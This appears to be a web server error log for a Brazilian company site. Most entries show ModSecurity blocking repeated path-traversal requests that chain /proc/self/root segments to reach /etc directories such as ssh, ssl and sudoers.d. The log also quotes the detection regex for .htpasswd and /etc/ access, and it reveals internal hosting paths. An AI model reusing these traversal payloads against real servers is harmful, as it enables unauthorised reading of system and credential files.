https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:24:14.054683 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:43128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4_vu8EFLIOrSqIpuhlQAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:24:14.261228 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:43128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv4_vu8EFLIOrSqIpuhlgAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:24:18.731114 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:43132] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv5Avu8EFLIOrSqIpuhmQAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:24:19.037810 2026] [proxy_fcgi:error] [pid 26799:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:34250] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:24:34.316411 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:55128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv5Eta6ubjKNq_cu4ZN2AAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:24:38.884724 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:45096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv5FuyqAr6etmhZHNpdrAAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:24:55.130904 2026] [proxy_fcgi:error] [pid 19093:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:34954] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:25:07.393020 2026] [mime_magic:error] [pid 26799:tid 140411666392832] (70014)End of file found: [client 57.141.18.93:36522] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:25:29.134504 2026] [proxy_fcgi:error] [pid 17887:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:35750] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:25:57.133792 2026] [proxy_fcgi:error] [pid 27293:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:36346] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:26:13.121089 2026] [core:alert] [pid 27403:tid 140411624429312] [client 57.141.18.28:38532] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 10:26:16.677808 2026] [mime_magic:error] [pid 27403:tid 140411691570944] (70014)End of file found: [client 57.141.18.75:37978] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:26:21.066395 2026] [proxy_fcgi:error] [pid 17653:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:36814] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:26:48.129772 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:37424] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:26:59.208389 2026] [mime_magic:error] [pid 30077:tid 140411590858496] (70014)End of file found: [client 57.141.18.113:39464] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:27:12.137797 2026] [proxy_fcgi:error] [pid 15826:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:37954] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:27:38.229845 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:38558] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:28:02.643643 2026] [proxy_fcgi:error] [pid 27293:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:39092] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:28:24.129812 2026] [proxy_fcgi:error] [pid 19093:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:39628] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:28:47.097819 2026] [proxy_fcgi:error] [pid 27403:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:40160] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:28:56.347718 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.228.61:36062] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abv6GOoXxyEfFpUF8f8LrQAAAUc"]
[Thu Mar 19 10:29:09.137784 2026] [proxy_fcgi:error] [pid 27403:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:40666] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:29:11.598240 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.243.128:44616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv6J-yqAr6etmhZHNpeOgAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:29:13.492337 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.243.128:44616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv6KeyqAr6etmhZHNpePQAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:29:29.016640 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:35552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv6OeoXxyEfFpUF8f8LvAAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:29:32.145959 2026] [proxy_fcgi:error] [pid 15826:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41240] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:29:56.125808 2026] [proxy_fcgi:error] [pid 15826:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:41744] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:30:16.190540 2026] [core:alert] [pid 27403:tid 140411716749056] [client 57.141.18.48:44230] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 10:30:21.134487 2026] [proxy_fcgi:error] [pid 27293:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:42234] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:30:44.929046 2026] [:error] [pid 27403:tid 140411548894976] [client 74.7.243.128:54446] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv6gxkFeYa1D6dYQnDthwAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:30:50.113179 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:34596] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv6iuoXxyEfFpUF8f8L6QAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:30:51.813890 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:42880] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:30:52.470934 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.243.128:35326] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv6jAbLMZ6AikZjR9Va3gAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:30:54.693419 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.243.128:35336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv6jgbLMZ6AikZjR9Va4gAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:31:19.090792 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:35352] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv6puoXxyEfFpUF8f8MCQAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:31:24.069872 2026] [proxy_fcgi:error] [pid 27403:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:43574] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:31:26.515378 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:44508] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv6rgkwaGbbGflqUZC9dwAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 10:31:30.115526 2026] [mime_magic:error] [pid 31803:tid 140411590858496] (70014)End of file found: [client 57.141.18.10:45540] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:31:35.360662 2026] [:error] [pid 27293:tid 140411674785536] [client 74.7.243.128:40794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv6t_-YZRR_7pZ7nDKJPwAAA8g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:31:52.149802 2026] [proxy_fcgi:error] [pid 17887:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:44160] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:32:20.281856 2026] [proxy_fcgi:error] [pid 17887:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:44798] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:32:27.386113 2026] [mime_magic:error] [pid 27403:tid 140411658000128] (70014)End of file found: [client 57.141.18.56:47068] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:32:45.122276 2026] [proxy_fcgi:error] [pid 27403:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:45384] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:33:10.129809 2026] [proxy_fcgi:error] [pid 17653:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:45954] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:33:34.125782 2026] [proxy_fcgi:error] [pid 27403:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:46640] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:33:42.642529 2026] [:error] [pid 27293:tid 140411725141760] [client 74.7.243.128:33378] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv7Nv-YZRR_7pZ7nDKJkgAAA8I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:33:48.038072 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:56998] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv7PPu8EFLIOrSqIpujAAAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:33:59.126889 2026] [proxy_fcgi:error] [pid 26799:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:47204] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:34:06.018212 2026] [:error] [pid 19093:tid 140411565680384] [client 74.7.243.128:57890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv7Tl_V7PWP6ixUYl66IwAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
